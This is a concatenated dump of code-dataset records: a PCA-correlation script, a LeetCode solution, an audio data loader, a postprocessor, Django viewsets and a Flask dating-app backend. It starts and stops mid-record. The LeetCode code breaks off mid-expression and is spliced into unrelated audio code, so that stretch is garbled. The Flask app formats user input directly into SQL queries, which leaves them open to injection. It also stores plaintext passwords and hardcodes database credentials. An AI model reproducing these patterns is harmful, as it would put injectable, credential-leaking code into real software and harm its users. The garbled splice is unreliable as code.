pvalue, index = vals\n        new_values.append((n/rank) * pvalue)\n    ## xrange was a built in function in python2.x, it was renamed to range in python3.x\n    ## used by qiime2\n    ## for i in xrange(0, int(n)-1): (Mike's original)\n    for i in range(0, int(n)-1):\n        if new_values[i] < new_values[i+1]:\n            new_values[i+1] = new_values[i]\n    for i, vals in enumerate(values):\n        pvalue, index = vals\n        new_pvalues[index] = new_values[i]\n    return
new_pvalues\n\n\ndef main(args):\n    pcs = read_pc(args.input_fp, args.min_explained)\n    meta = pd.read_table(args.mapping_fp, index_col=0)\n\n    if args.is_continuous:\n        correls = pd.DataFrame(index=[\"R value\", \"p\"])\n        for pc_axis in pcs:\n            corr = spearmanr(meta[args.metadata_label], pcs[pc_axis])\n            correls[pc_axis] = corr\n        correls = correls.transpose()\n        correls['p_adj'] = bh_adjust(correls['p'])\n        correls.to_csv(args.output_fp, sep='\\t')\n\n    else:\n        raise NotImplementedError()\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument(\"-i\", \"--input_fp\", help=\"table of principal components only\", required=True)\n    parser.add_argument(\"-m\", \"--mapping_fp\", help=\"mapping file location\", required=True)\n    parser.add_argument(\"-o\", \"--output_fp\", help=\"output file location\", default=\"pc_correlations.txt\")\n    parser.add_argument(\"-c\", \"--metadata_label\", help=\"metadata column to correlate with the principal components\", required=True)\n    parser.add_argument(\"--correl_method\", help=\"correlation method\", default=\"spearman\")\n    parser.add_argument(\"--is_continuous\", help=\"treat the metadata label as continuous data\", default=False, action=\"store_true\")\n    parser.add_argument(\"--min_explained\", help=\"minimum percent explained to be included in analysis\", default=0., type=float)\n\n    args = parser.parse_args()\n\n    main(args)\n","sub_path":"cross-sectional/01-scriptsForASDpaper/which_pc_explains.py","file_name":"which_pc_explains.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406637204","text":"#\n# @lc app=leetcode.cn id=74 lang=python3\n#\n# [74] Search a 2D Matrix\n#\n\n# @lc code=start\nclass Solution:\n    def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n        if not matrix:\n            return False\n        m = len(matrix)\n        n = len(matrix[0])\n        for i in range(m):\n            if matrix[i][n-1] == target:\n                return True\n            if matrix[i][n-1] > target:\n                break\n        left = 0\n        right = n-1\n        while left<=right:\n            mid = (left+right)//2\n            if matrix[i][mid]==target:\n                return True\n            elif matrix[i][mid]>target:\n                right = mid - 1\n            elif matrix[i][mid]= len(self.start_samples):\n            print(\"error: sample index \" + str(sample_index) +\n                  \" is too high. 
Results in file_index \" + str(file_index))\n position_in_file = sample_index - self.start_samples[file_index]\n end_position_in_next_file = sample_index + \\\n self._item_length + 1 - self.start_samples[file_index + 1]\n\n if end_position_in_next_file < 0:\n file_name = 'arr_' + str(file_index)\n this_file = np.load(self.dataset_file, mmap_mode='r')[file_name]\n sample = this_file[position_in_file:position_in_file +\n self._item_length + 1]\n else:\n # load from two files\n file1 = np.load(self.dataset_file, mmap_mode='r')[\n 'arr_' + str(file_index)]\n file2 = np.load(self.dataset_file, mmap_mode='r')[\n 'arr_' + str(file_index + 1)]\n sample1 = file1[position_in_file:]\n sample2 = file2[:end_position_in_next_file]\n sample = np.concatenate((sample1, sample2))\n\n # Only if training: Pitch modulation\n if self.train:\n # Reverse quantization and encoding\n y = decode_mu(sample, self.classes)\n\n seg_length = int(self.sampling_rate *\n (random() * 0.25 + 0.25)) # 1/4 -> 1/2\n s = randint(0, self.sampling_rate - seg_length)\n e = s + seg_length\n\n n_steps = random() - 0.5 # +- 0.5\n shifted = lr.effects.pitch_shift(\n y[s:e], sr=self.sampling_rate, n_steps=n_steps)\n y[s:e] = np.clip(shifted, -1, 1)\n\n sample = quantize_data(y, self.classes, mu=True)\n\n example = torch.from_numpy(sample).type(torch.LongTensor)\n input = example[:self._item_length].unsqueeze(0)\n target = example[-self.target_length:].unsqueeze(0)\n\n one_hot = torch.FloatTensor(self.classes, self._item_length).zero_()\n one_hot.scatter_(0, input, 1.)\n\n return self.domain_index, one_hot, target\n\n def __len__(self):\n test_length = math.floor(self._length / self._test_stride)\n if self.train:\n return self._length - test_length\n else:\n return test_length\n\n\ndef quantize_data(data, classes, mu=True):\n x = data\n if mu:\n x = mu_law_encoding(x, classes)\n\n bins = np.linspace(-1, 1, classes)\n quantized = np.digitize(x, bins) - 1\n return quantized\n\ndef decode_mu(data, classes):\n y = (data / classes) * 2. 
- 1\n y = mu_law_expansion(y, classes)\n return y\n\ndef list_all_audio_files(location):\n audio_files = []\n if is_music_file(location):\n audio_files.append(location)\n else:\n for dirpath, dirnames, filenames in os.walk(location):\n for filename in [f for f in filenames if is_music_file(f)]:\n audio_files.append(os.path.join(dirpath, filename))\n\n if len(audio_files) == 0:\n print(\"found no audio files in \" + location)\n return audio_files\n\n\ndef is_music_file(f):\n return f.endswith((\".m4a\", \".mp3\", \".wav\", \".aif\", \"aiff\"))\n\n\ndef mu_law_encoding(data, mu):\n mu_x = np.sign(data) * np.log(1 + mu * np.abs(data)) / np.log(mu + 1)\n return mu_x\n\n\ndef mu_law_expansion(data, mu):\n s = np.sign(data) * (np.exp(np.abs(data) * np.log(mu + 1)) - 1) / mu\n return s\n\n\ndef convert_output_to_signal(x, classes):\n x = x.squeeze()\n dim = x.dim()\n x = x.transpose(dim - 2, dim - 1)\n\n prob = F.softmax(x, dim=dim - 1) # map seconds to buckets\n prob = prob.cpu()\n np_prob = prob.data.numpy() # Compute SM bucket for second\n\n x = np.apply_along_axis(\n lambda p: np.random.choice(classes, p=p), dim - 1, np_prob)\n return x\n\nclass CausalConv1d(nn.Conv1d):\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n dilation=1,\n groups=1,\n bias=True):\n self.__padding = (kernel_size - 1) * dilation\n\n super(CausalConv1d, self).__init__(\n in_channels,\n out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=self.__padding,\n dilation=dilation,\n groups=groups,\n bias=bias)\n\n def forward(self, input):\n result = super(CausalConv1d, self).forward(input)\n if self.__padding != 0:\n return result[:, :, :-self.__padding]\n return result\n\n","sub_path":"audio_data.py","file_name":"audio_data.py","file_ext":"py","file_size_in_byte":8943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"478823411","text":"\"\"\"\nCopyright (c) 2019 Intel Corporation\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom functools import singledispatch\nfrom typing import Union\nimport numpy as np\nfrom ..config import StringField\nfrom ..representation import DetectionAnnotation, DetectionPrediction, TextDetectionPrediction, TextDetectionAnnotation\nfrom .postprocessor import Postprocessor, BasePostprocessorConfig\n\n\nclass CastToInt(Postprocessor):\n __provider__ = 'cast_to_int'\n annotation_types = (DetectionAnnotation, TextDetectionAnnotation)\n prediction_types = (DetectionPrediction, TextDetectionPrediction)\n\n round_policies_func = {\n 'nearest': np.rint,\n 'nearest_to_zero': np.trunc,\n 'lower': np.floor,\n 'greater': np.ceil\n }\n\n def validate_config(self):\n class _CastToIntConfigValidator(BasePostprocessorConfig):\n round_policy = StringField(optional=True, choices=self.round_policies_func.keys())\n\n cast_to_int_config_validator = _CastToIntConfigValidator(\n self.__provider__, on_extra_argument=_CastToIntConfigValidator.ERROR_ON_EXTRA_ARGUMENT\n )\n cast_to_int_config_validator.validate(self.config)\n\n def 
configure(self):\n self.round_func = self.round_policies_func[self.config.get('round_policy', 'nearest')]\n\n def process_image(self, annotation, prediction):\n @singledispatch\n def cast(entry):\n pass\n\n @cast.register(Union[DetectionAnnotation, DetectionPrediction])\n def _(entry):\n entry.x_mins = self.round_func(entry.x_mins)\n entry.x_maxs = self.round_func(entry.x_maxs)\n entry.y_mins = self.round_func(entry.y_mins)\n entry.y_maxs = self.round_func(entry.y_maxs)\n\n @cast.register(Union[TextDetectionAnnotation, TextDetectionPrediction])\n def _(entry):\n entry.points = self.round_func(entry.points)\n\n\n for annotation_ in annotation:\n cast(annotation_)\n\n for prediction_ in prediction:\n cast(prediction_)\n\n return annotation, prediction\n","sub_path":"tools/accuracy_checker/accuracy_checker/postprocessor/cast_to_int.py","file_name":"cast_to_int.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"178969069","text":"from rest_framework.viewsets import ModelViewSet\nfrom rest_framework.permissions import (IsAdminUser, IsAuthenticated)\nfrom rest_framework.status import (HTTP_204_NO_CONTENT, HTTP_404_NOT_FOUND)\nfrom rest_framework.response import Response\n\nfrom .serializers import (CountrySerializer, AdminCountrySerializer, StateSerializer,\n AdminStateSerializer, CitySerializer, AdminCitySerializer, TaxSerializer, AdminTaxSerializer)\nfrom .models import (Countries, States, Cities, Taxes)\n\nfrom permissions import ReadOnly\n\n\nclass CountryViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminCountrySerializer\n return CountrySerializer\n\n def destroy(self, request, *args, **kwargs):\n country = Countries.objects.get(id=kwargs['pk'])\n if (country.deleted == False):\n # Setting Countries deleted to True\n country.deleted = True\n # Saving Changes\n country.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return Countries.objects.all().order_by('id')\n return Countries.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n\n\nclass StateViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminStateSerializer\n return StateSerializer\n\n def destroy(self, request, *args, **kwargs):\n state = States.objects.get(id=kwargs['pk'])\n if (state.deleted == False):\n # Setting States deleted to True\n state.deleted = True\n # Saving Changes\n state.save()\n\n return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n def get_queryset(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return States.objects.all().order_by('id')\n return States.objects.filter(deleted=False).order_by('id')\n\n permission_classes = (IsAdminUser | ReadOnly,)\n\n\nclass CityViewSet(ModelViewSet):\n def get_serializer_class(self):\n if self.request.user.is_authenticated:\n if self.request.user.admin:\n return AdminCitySerializer\n return CitySerializer\n\n def destroy(self, request, *args, **kwargs):\n city = Cities.objects.get(id=kwargs['pk'])\n if (city.deleted == 
False):\n            # Setting Cities deleted to True\n            city.deleted = True\n            # Saving Changes\n            city.save()\n\n            return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n        return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n    def get_queryset(self):\n        if self.request.user.is_authenticated:\n            if self.request.user.admin:\n                return Cities.objects.all().order_by('id')\n        return Cities.objects.filter(deleted=False).order_by('id')\n\n    permission_classes = (IsAdminUser | ReadOnly,)\n\nclass TaxViewSet(ModelViewSet):\n    def get_serializer_class(self):\n        if self.request.user.is_authenticated:\n            if self.request.user.admin:\n                return AdminTaxSerializer\n        return TaxSerializer\n\n    def destroy(self, request, *args, **kwargs):\n        tax = Taxes.objects.get(id=kwargs['pk'])\n        if (tax.deleted == False):\n            # Setting Taxes deleted to True\n            tax.deleted = True\n            # Saving Changes\n            tax.save()\n\n            return Response(data='Successfully Deleted', status=HTTP_204_NO_CONTENT)\n        return Response(data='No Such Data Was Found', status=HTTP_404_NOT_FOUND)\n\n    def get_queryset(self):\n        if self.request.user.is_authenticated:\n            if self.request.user.admin:\n                return Taxes.objects.all().order_by('id')\n        return Taxes.objects.filter(deleted=False).order_by('id')\n\n    permission_classes = (IsAdminUser | ReadOnly,)\n","sub_path":"taxes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"425059128","text":"from sqlalchemy import *\r\nfrom sqlalchemy.sql import *\r\nfrom flask import *\r\nfrom flask.ext.session import Session\r\nfrom json import dumps\r\nimport datetime\r\nimport glob\r\nimport os\r\napp = Flask(__name__)\r\n\r\nengine = create_engine('mysql://serveurTinsa:TInSa@localhost/baseTinsa', echo=True)\r\nconnection = engine.connect()\r\n\r\n# ___ LOGIN/SIGNUP pages ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/index.html')\r\ndef index():\r\n\treturn redirect(url_for('accueil'))\r\n\r\n@app.route('/') \r\ndef accueil():\r\n\tif 'userID' in session:\r\n\t\treturn redirect(url_for('match'))\r\n\telse:\r\n\t\treturn render_template('index.html')\r\n\r\n\t#POST\r\n@app.route('/inscription', methods=['POST'])\r\ndef inscription():\r\n\tbirth = \"{0}/{1}/{2}\".format(request.form['birthyear'],request.form['birthmonth'],request.form['birthday'])\r\n\tconnection.execute(\"INSERT INTO Users(nom, prenom, sexe, date_naissance, departement, mail, annee, password) VALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', {6}, '{7}')\".format(request.form['nom'], request.form['prenom'], request.form['sexe'], birth, request.form['depart'],request.form['email'], request.form['annee'], request.form['pwd']))\r\n\treturn redirect(url_for('accueil'));\r\n\r\n@app.route('/connect', methods=['POST'])\r\ndef connect():\r\n\tusername = request.form['email']\r\n\tpassword = request.form['pwd']\r\n\tliste = connection.execute(\"SELECT password FROM Users WHERE mail = '{0}'\".format(username))\r\n\trealPassword = liste.fetchone()\r\n\tif realPassword is None:\r\n\t\treturn redirect(url_for('accueil'))\r\n\tif (realPassword[0]) == password:\r\n\t\tlisteID = (connection.execute(\"SELECT id_user FROM Users WHERE mail = '{0}'\".format(username)))\r\n\t\tuserID = (listeID.fetchone())[0]\r\n\t\tsession['userID'] = userID\r\n\treturn redirect(url_for('accueil'))\r\n\r\n@app.route('/disconnect')\r\ndef disconnect():\r\n\tsession.pop('username', None)\r\n\tsession.pop('userID', None)\r\n\t\r\n\treturn 
redirect(url_for('accueil'))\r\n\r\n# ___ PROFILE pages ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/profil.html')\r\ndef profil():\r\n\treturn render_template('profil.html')\r\n\r\n\t#JSON\r\n@app.route('/profil.json')\r\ndef profiljson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, nom, contact, mail FROM Users WHERE Users.id_user = {0}\".format(session['userID']))\r\n\tfichierJSON = [serializeForProfil(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForProfil(user):\r\n\treturn {\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'bio': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'nom' : user[6],\r\n\t\t'contact' : user[7],\r\n\t\t'mail' : user[8]\r\n\t}\r\n\r\n\r\n# ___ PROFILE EDIT pages ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/modprofil.html')\r\ndef modprofil():\r\n\treturn render_template('modprofil.html')\r\n\r\n\t#POST\r\n@app.route('/modification', methods=['POST'])\r\ndef modification():\r\n\tif request.form['nom'] :\r\n\t\tconnection.execute(\"UPDATE Users SET nom = '{0}' WHERE id_user = '{1}'\".format(request.form['nom'], session['userID']))\r\n\tif request.form['prenom'] :\r\n\t\tconnection.execute(\"UPDATE Users SET prenom = '{0}' WHERE id_user = '{1}'\".format(request.form['prenom'], session['userID']))\r\n\tif request.form['email'] :\r\n\t\tconnection.execute(\"UPDATE Users SET mail = '{0}' WHERE id_user = '{1}'\".format(request.form['email'], session['userID']))\r\n\tif request.form['depart'] != 'NULL':\r\n\t\tconnection.execute(\"UPDATE Users SET departement = '{0}' WHERE id_user = '{1}'\".format(request.form['depart'], session['userID']))\r\n\tif request.form['pwd'] :\r\n\t\tconnection.execute(\"UPDATE Users SET password = '{0}' WHERE id_user = '{1}'\".format(request.form['pwd'], session['userID']))\r\n\tif request.form['bio'] :\r\n\t\tconnection.execute(\"UPDATE Users SET biographie = '{0}' WHERE id_user = '{1}'\".format(request.form['bio'], session['userID']))\r\n\tif request.form['annee'] != 'NULL' :\r\n\t\tconnection.execute(\"UPDATE Users SET annee = {0} WHERE id_user = '{1}'\".format(request.form['annee'], session['userID']))\r\n\tif request.form['birthday'] != \"-\" :\r\n\t\tbirth = \"{0}/{1}/{2}\".format(request.form['birthyear'],request.form['birthmonth'],request.form['birthday'])\r\n\t\tconnection.execute(\"UPDATE Users SET date_naissance = '{0}' WHERE id_user = '{1}'\".format(birth, session['userID']))\r\n\tif request.form['sexe'] != 'NULL' :\r\n\t\tconnection.execute(\"UPDATE Users SET sexe = '{0}' WHERE id_user = '{1}'\".format(request.form['sexe'], session['userID']))\r\n\tif request.form['urlfacebook'] :\r\n\t\tconnection.execute(\"UPDATE Users SET contact = '{0}' WHERE id_user = '{1}'\".format(request.form['urlfacebook'], session['userID']))\r\n\tif request.files['photo'] :\r\n\t\tphoto = request.files['photo']\r\n\t\textension = photo.content_type.split(\"/\")[1]\r\n\t\tprint(\"Extension : {0}\".format(extension))\r\n\t\tfor file in glob.glob(\"./profil_pictures/{0}.*\".format(session['userID'])):\r\n\t\t\tos.remove(file)\r\n\t\tphoto.save(\"./profil_pictures/\" + \"{0}\".format(session['userID']) + \".\" + extension)\r\n\treturn redirect(url_for('profil'))\r\n\r\n\r\n# ___ MATCH pages ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/match.html')\r\ndef match():\r\n\treturn 
render_template('match.html')\r\n\r\n\t#JSON\r\n@app.route('/data.json')\r\ndef data():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance FROM Users WHERE Users.id_user NOT IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0}) AND Users.id_user != {0}\".format(session['userID']))\r\n\tfichierJSON = [serializeForMatch(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n\r\ndef serializeForMatch(user):\r\n\treturn {\r\n\t\t'id': '{0}'.format(user[0]),\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'biographie': user[4],\r\n\t\t'photo': \"./profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25))\r\n\t}\r\n\r\n\t#POSTS\r\n@app.route('/dislike/<IDDisliker>', methods=['POST'])\r\ndef dislike(IDDisliker):\r\n\tconnection.execute(\"INSERT INTO Swipes(id_userWhoLike, id_userIsLiked, date_swipe, liked) VALUES ({0}, {1}, '{2}', {3})\".format(session['userID'],IDDisliker, datetime.datetime.now(),False))\r\n\treturn 'DONE'\r\n\r\n@app.route('/like/<IDLiker>', methods=['POST'])\r\ndef like(IDLiker):\r\n\tconnection.execute(\"INSERT INTO Swipes(id_userWhoLike, id_userIsLiked, date_swipe, liked) VALUES ({0}, {1}, '{2}', {3})\".format(session['userID'],IDLiker, datetime.datetime.now(),True))\r\n\trequete = connection.execute(\"SELECT COUNT(id_UserIsLiked) FROM Swipes WHERE id_UserIsLiked = {0} AND id_userWhoLike = {1} AND liked IS True\".format(session['userID'],IDLiker))\r\n\tif requete.fetchone()[0] != 0 :\r\n\t\tconnection.execute(\"INSERT INTO Affinites(id_user1, id_user2, date_affinite) VALUES ({0}, {1}, '{2}')\".format(session['userID'],IDLiker,datetime.datetime.now()))\r\n\treturn 'DONE'\r\n\r\n# ___ EVENT CREATION pages ___ #\r\n\r\n\t#ROUTE\r\n@app.route('/create_event.html')\r\ndef create_event():\r\n\treturn render_template('create_event.html')\r\n\r\n\t#POST\r\n@app.route('/eventcreate', methods=['POST'])\r\ndef eventcreate():\r\n\tdate = \"{0}/{1}/{2}\".format(request.form['year'],request.form['month'],request.form['day'])\r\n\tconnection.execute(\"INSERT INTO Events(nom, id_creator, date_event, lieu, description) VALUES ('{0}', {1}, '{2}', '{3}', '{4}')\".format(request.form['eventname'], session['userID'], date, request.form['eventplace'], request.form['eventdesc']))\r\n\tIDEvent = connection.execute(\"SELECT id_event FROM Events WHERE id_creator = {0} AND nom = '{1}'\".format(session['userID'], request.form['eventname'])).fetchone()[0]\r\n\tprint(\"IDEVENT = {0}\".format(IDEvent))\r\n\tif request.files['eventimage'] :\r\n\t\tphoto = request.files['eventimage']\r\n\t\textension = photo.content_type.split(\"/\")[1]\r\n\t\tprint(\"Extension : {0}\".format(extension))\r\n\t\tphoto.save(\"./event_pictures/\" + \"{0}\".format(IDEvent) + \".\" + extension)\r\n\treturn redirect(url_for('profil'))\r\n\r\n\r\ndef serializeForAffinite(user):\r\n\treturn {\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'biographie': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'contact' : user[6]\r\n\t}\r\n\r\n# ___ AFFINITIES/LIKE/DISLIKE pages ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/likes.html')\r\ndef likes():\r\n\treturn render_template('likes.html')\r\n\r\n@app.route('/dislikes.html')\r\ndef dislikes():\r\n\treturn render_template('dislikes.html')\r\n\r\n@app.route('/affinites.html')\r\ndef affinites():\r\n\treturn 
render_template('affinites.html')\r\n\r\n\t#UNLIKED/RELIKED\r\n@app.route('/deleteAffinites/<idDelete>', methods=['POST'])\r\ndef deleteAffinites(idDelete):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idDelete, False))\r\n\tconnection.execute(\"DELETE FROM Affinites WHERE (id_user1 = {0} AND id_user2 = {1}) OR (id_user1 = {1} AND id_user2 = {0})\".format(session['userID'],idDelete))\r\n\treturn redirect(url_for('affinites'))\r\n\r\n@app.route('/deleteLikes/<idLiked>', methods=['POST'])\r\ndef deleteLikes(idLiked):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idLiked, False))\r\n\treturn redirect(url_for('likes'))\r\n\r\n@app.route('/reLikes/<idLiked>', methods=['POST'])\r\ndef reLikes(idLiked):\r\n\tconnection.execute(\"UPDATE Swipes SET liked = {2} WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idLiked, True))\r\n\trequete = connection.execute(\"SELECT COUNT(id_UserIsLiked) FROM Swipes WHERE id_UserIsLiked = {0} AND id_userWhoLike = {1} AND liked IS True\".format(session['userID'],idLiked))\r\n\tif requete.fetchone()[0] != 0 :\r\n\t\tconnection.execute(\"INSERT INTO Affinites(id_user1, id_user2, date_affinite) VALUES ({0}, {1}, '{2}')\".format(session['userID'],idLiked,datetime.datetime.now()))\r\n\treturn redirect(url_for('dislikes'))\r\n\r\n@app.route('/deleteDislikes/<idDisliked>', methods=['POST'])\r\ndef deleteDislike(idDisliked):\r\n\tconnection.execute(\"DELETE FROM Swipes WHERE id_userWhoLike = {0} AND id_userIsLiked = {1}\".format(session['userID'], idDisliked))\r\n\treturn redirect(url_for('dislikes'))\r\n\r\n\t#JSON\r\n@app.route('/likes.json')\r\ndef likesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0} AND liked IS True) AND Users.id_user NOT IN (SELECT id_user1 FROM Affinites WHERE id_user2 = {0}) AND Users.id_user NOT IN (SELECT id_user2 FROM Affinites WHERE id_user1 = {0})\".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/dislikes.json')\r\ndef dislikesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_userIsLiked FROM Swipes WHERE id_userWhoLike = {0} AND liked IS False)\".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/affinites.json')\r\ndef affinitesjson():\r\n\trequete = connection.execute(\"SELECT id_user, prenom, departement, annee, biographie, date_naissance, mail, nom FROM Users WHERE Users.id_user IN (SELECT id_user1 FROM Affinites WHERE id_user2 = {0}) OR Users.id_user IN (SELECT id_user2 FROM Affinites WHERE id_user1 = {0}) \".format(session['userID']))\r\n\tfichierJSON = [serializeForAffinite(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForAffinite(user):\r\n\treturn {\r\n\t\t'id': user[0],\r\n\t\t'prenom': user[1],\r\n\t\t'depart': user[2],\r\n\t\t'annee': user[3],\r\n\t\t'bio': user[4],\r\n\t\t'photo': \"profil_pictures/{0}\".format(user[0]),\r\n\t\t'age' : int(((datetime.datetime.now() - user[5]).days/365.25)),\r\n\t\t'contact' : user[6],\r\n\t\t'nom' : user[7]\r\n\t}\r\n\r\n\r\n# ___ 
EVENTS pages ___ #\r\n\r\n\t#ROUTES\r\n@app.route('/event.html')\r\ndef event():\r\n\treturn render_template('event.html')\r\n\r\n@app.route('/eventgo.html')\r\ndef eventgo():\r\n\treturn render_template('eventgo.html')\r\n\r\n@app.route('/myevent.html')\r\ndef myevent():\r\n\treturn render_template('myevent.html')\r\n\r\n\t#JSON\r\n@app.route('/event.json')\r\ndef eventjson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_event NOT IN (SELECT id_event FROM Participants WHERE id_partener = {0}) AND Events.id_event NOT IN (SELECT id_event FROM Events WHERE id_creator = {0}) GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\ndef serializeForEvent(event):\r\n\treturn {\r\n\t\t\"nom\": event[1],\r\n\t\t\"lieu\": event[4],\r\n\t\t\"date\": event[3].strftime(\"%d/%m/%y\"),\r\n\t\t\"desc\": event[5],\r\n\t\t\"photo\": \"event_pictures/{0}\".format(event[0]),\r\n\t\t\"nombre\": event[6]+1,\r\n\t\t\"id\":event[0],\r\n\t\t\"contact\": event[7]\r\n\t}\r\n\r\n@app.route('/eventgo.json')\r\ndef eventgojson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_event IN (SELECT id_event FROM Participants WHERE id_partener = {0}) GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n@app.route('/myevent.json')\r\ndef myeventjson():\r\n\trequete = connection.execute(\"SELECT Events.id_event, Events.nom, Events.id_creator, Events.date_event, Events.lieu, Events.description, COUNT(Participants.id_partener), Users.contact FROM Events LEFT JOIN Participants ON Events.id_event = Participants.id_event LEFT JOIN Users ON Users.id_user = Events.id_creator WHERE Events.id_creator = {0} GROUP BY Events.id_event ORDER BY Events.date_event\".format(session['userID']))\r\n\tfichierJSON = [serializeForEvent(e) for e in requete]\r\n\treturn (dumps(fichierJSON))\r\n\r\n\r\n\r\n\r\n\r\n\t#PARTICIPATION\r\n@app.route('/participe/<IDEvent>', methods=['POST'])\r\ndef participe(IDEvent):\r\n\tconnection.execute(\"INSERT INTO Participants(id_partener, id_event) VALUES ({0}, {1})\".format(session['userID'],IDEvent))\r\n\treturn 'DONE'\r\n\r\n@app.route('/supprimer/<IDEvent>',methods=['POST'])\r\ndef supprimer(IDEvent):\r\n\tif (connection.execute(\"SELECT id_creator FROM Events WHERE id_event = {0}\".format(IDEvent))).fetchone()[0] == session['userID']:\r\n\t\tconnection.execute(\"DELETE FROM Events WHERE id_event = {0}\".format(IDEvent))\r\n\treturn \"DONE\"\r\n\t\t\r\n@app.route('/dessiste/<IDEvent>', methods=['POST'])\r\ndef desiste(IDEvent):\r\n\tconnection.execute(\"DELETE FROM Participants WHERE id_partener = {0} AND id_event = {1}\".format(session['userID'],IDEvent))\r\n\treturn 'DONE'\r\n\r\n# ___ Routes for CONFIGURATION files ___ #\r\n@app.route('/css/<file>')\r\ndef css(file):\r\n\treturn send_from_directory('templates/css', 
